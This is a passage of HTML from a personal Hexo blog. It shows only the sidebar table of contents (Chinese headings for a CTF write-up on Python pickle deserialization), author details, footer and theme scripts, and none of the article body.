    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%95%BF%E5%9F%8E%E6%9D%AFez-python%E5%A4%8D%E7%9B%98"><span class="nav-number">1.</span> <span class="nav-text">长城杯ez_python复盘</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ez-python"><span class="nav-number">1.1.</span> <span class="nav-text">ez_python</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Python-%E7%9A%84%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%98%AF%E4%BB%80%E4%B9%88"><span class="nav-number">1.2.</span> <span class="nav-text">Python 的序列化和反序列化是什么</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%AE%9E%E7%8E%B0%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">1.3.</span> <span class="nav-text">为什么要实现序列化和反序列化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#python-%E6%98%AF%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84"><span class="nav-number">1.4.</span> <span class="nav-text">python 是怎么实现序列化和反序列化的</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%87%A0%E4%B8%AA%E9%87%8D%E8%A6%81%E7%9A%84%E5%87%BD%E6%95%B0"><span class="nav-number">1.4.1.</span> <span class="nav-text">1.几个重要的函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-PVM-%E7%9A%84%E7%BB%84%E6%88%90"><span class="nav-number">1.4.2.</span> <span class="nav-text">2.PVM 的组成</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%BC%95%E6%93%8E%E7%9A%84%E4%BD%9C%E7%94%A8"><span class="nav-number">1.4.2.1.</span> <span class="nav-text">1.引擎的作用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E6%A0%88%E5%8C%BA%E7%9A%84%E4%BD%9C%E7%94%A8"><span class="nav-number">1.4.2.2.</span> <span class="nav-text">2.栈区的作用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E6%A0%87%E7%AD%BE%E5%8C%BA%E7%9A%84%E4%BD%9C%E7%94%A8"><span class="nav-number">1.4.2.3.</span> <span class="nav-text">3.标签区的作用</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-PVM-%E6%93%8D%E4%BD%9C%E7%A0%81"><span class="nav-number">1.4.3.</span> <span class="nav-text">3.PVM 操作码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%B5%81%E7%A8%8B"><span class="nav-number">1.4.4.</span> <span class="nav-text">4.反序列化流程</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8E-PHP-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E5%AF%B9%E6%AF%94"><span class="nav-number">1.5.</span> <span class="nav-text">与 PHP 反序列化的对比</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Python-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E4%BD%95%E6%9D%A5"><span class="nav-number">1.6.</span> <span class="nav-text">Python 反序列化漏洞何来</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%88%91%E4%BB%AC%E6%80%8E%E4%B9%88%E5%88%A9%E7%94%A8%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.6.1.</span> <span class="nav-text">我们怎么利用反序列化漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E7%90%86%E8%AE%BA%E5%9F%BA%E7%A1%80"><span class="nav-number">1.6.1.1.</span> <span class="nav-text">1.理论基础</span></a></li></ol></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="stary"
      src="/images/D6C0CCF9F70347CF46810729EAC3C281.png">
  <p class="site-author-name" itemprop="name">stary</p>
  <div class="site-description" itemprop="description">CTFer</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:450728870@qq.com" title="E-Mail → mailto:450728870@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">stary</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
